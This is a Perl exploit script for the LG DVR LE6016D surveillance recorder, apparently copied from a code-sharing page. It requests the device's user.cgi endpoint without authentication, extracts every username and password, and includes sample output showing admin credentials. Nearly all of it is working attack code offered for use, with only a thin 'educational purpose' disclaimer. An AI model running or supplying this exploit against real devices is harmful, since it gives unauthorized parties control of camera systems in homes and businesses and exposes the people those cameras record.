扫码分享
验证:
体验盒子
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 | #!/usr/bin/perl # #LG DVR LE6016D unauthenticated remote # users/passwords disclosure exploit # # #Copyright 2015 (c) Todor Donev #<todor.donev at gmail.com> #http://www.ethical-hacker.org/ #### # #Digital video recorder (DVR) surveillance is the use of cameras, #often hidden or concealed, that use DVR technology to record #video for playback or immediate viewing. As technological #innovations have made improvements in the security and #surveillance industry, DVR surveillance has become more #prominent and allows for easier and more versatile security #systems in homes and businesses. A DVR surveillance security #system can be designed for indoor use or outdoor use and can #often involve hidden security cameras, concealed “nanny cams” #for home security, and even personal recording devices hidden #on a person. # #### # #Description: #No authentication (login) is required to exploit this vulnerability. #This program demonstrates how unpatched security bug would enable #hackers to gain control of a vulnerable device while sitting #behind their keyboard, potentially thousands of miles away. #An unauthenticated attacker that is connected to the DVR's may be #able to retrieve the device's administrator password allowing them #to directly access the device's configuration control panel. # #### # #Disclaimer: #This or previous programs is for Educational purpose ONLY. Do not #use it without permission.The usual disclaimer applies, especially #the fact that Todor Donev is not liable for any damages caused by #direct or indirect use of the information or functionality provided #by these programs. The author or any Internet provider bears NO #responsibility for content or misuse of these programs or any #derivatives thereof. By using these programs you accept the fact #that any damage (dataloss, system crash, system compromise, etc.) #caused by the use of these programs is not Todor Donev's #responsibility. # #### #Use them at your own risk! #### # # $ perl lg.pl 133.7.133.7:80 #LG DVR LE6016D unauthenticated remote #users/passwords disclosure exploit #u/p: admin/000000 #u/p: user1/000000 #u/p: user2/000000 #u/p: user3/000000 #u/p: LOGOUT/000000 # Copyright 2015 (c) Todor Donev # <todor.donev at gmail.com> # http://www.ethical-hacker.org/ # #### use LWP::Simple; print " LG DVR LE6016D unauthenticated remote\n users/passwords disclosure exploit\n"; if (@ARGV == 0) {&usg; &foot;} while (@ARGV > 0) { $t = shift(@ARGV); } my $r = get("http://$t/dvr/wwwroot/user.cgi") or die("Error $!"); for (my $i=0; $i <= 4; $i++){ if($r =~ m/<name>(.*)<\/name>/g){ print " u\/p: $1\/"; } if($r =~ m/<pw>(.*)<\/pw>/g){ print "$1\n"; } } &foot; sub usg(){ print "\n Usage: perl $0 <target:port>\n Example: perl $0 133.7.133.7:80\n\n"; } sub foot(){ print "Copyright 2015 (c) Todor Donev\n<todor.donev at gmail.com>\n"; print "http://www.ethical-hacker.org/\n"; exit; } |
体验盒子
